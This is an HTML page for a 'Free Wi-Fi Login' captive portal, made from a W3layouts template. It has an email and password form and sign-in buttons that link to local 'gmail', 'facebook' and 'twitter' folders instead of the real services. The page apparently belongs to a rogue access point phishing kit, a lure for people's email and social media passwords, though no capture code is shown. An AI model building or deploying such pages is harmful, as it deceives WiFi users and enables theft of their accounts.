<!--
Author: W3layouts
Author URL: http://w3layouts.com
License: Creative Commons Attribution 3.0 Unported
License URL: http://creativecommons.org/licenses/by/3.0/
-->

<!DOCTYPE HTML>
<html>
<head>
<title>Free Wifi Login</title>
<link href="style.css" rel="stylesheet" type="text/css" media="all" />
<link href='http://fonts.googleapis.com/css?family=Rokkitt' rel='stylesheet' type='text/css'>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
</head>
<body>
<div class="wrap">
<!-- strat-contact-form -->	
<div class="contact-form">
<!-- start-form -->
	<form class="contact_form" action="#" method="post" name="contact_form">
		<h1>Free Wi-Fi Login</h1>
	    <ul>
	        <li>
	            <input type="email" class="textbox1" name="email" placeholder="compte@gmail.com" required />
	            <span class="form_hint">Enter a valid email</span>
	             <p><img src="http://i.imgur.com/KnP4w3X.png" alt=""></p>
	        </li>
	        <li>
	            <input type="password" name="website" class="textbox2" placeholder="password">
	            <p><img src="http://i.imgur.com/ytDKUxg.png" alt=""></p>
	        </li>
         </ul>
       	 	<input type="submit" name="Sign In" value="Sign In"/>
			<div class="clear"></div>	
			<label class="checkbox"><input type="checkbox" name="checkbox" checked><i></i>Remember me</label>
		<div class="forgot">
			<a href="gmail/index.html">forgot password?</a>
		</div>	
		<div class="clear"></div>	
	</form>
<!-- end-form -->
<!-- start-account -->
<div class="account">
	<h2><a href="gmail/index.html">Don't have an account? Sign Up !</a></h2>
    <div class="span"><a href="facebook/index.html"><img src="http://i.imgur.com/VIZJpTD.png" alt=""/><i>Sign In with Facebook</i><div class="clear"></div></a></div>	
    <div class="span1"><a href="twitter/index.html"><img src="http://i.imgur.com/Oh3QL2a.png" alt=""/><i>Sign In with Twitter</i><div class="clear"></div></a></div>
    <div class="span2"><a href="gmail/index.html"><img src="http://i.imgur.com/PYrxiJj.png" alt=""/><i>Sign In with Google+</i><div class="clear"></div></a></div>
</div>	
<!-- end-account -->
<div class="clear"></div>	
</div>
<!-- end-contact-form -->
</div>
</div>
</body>
</html>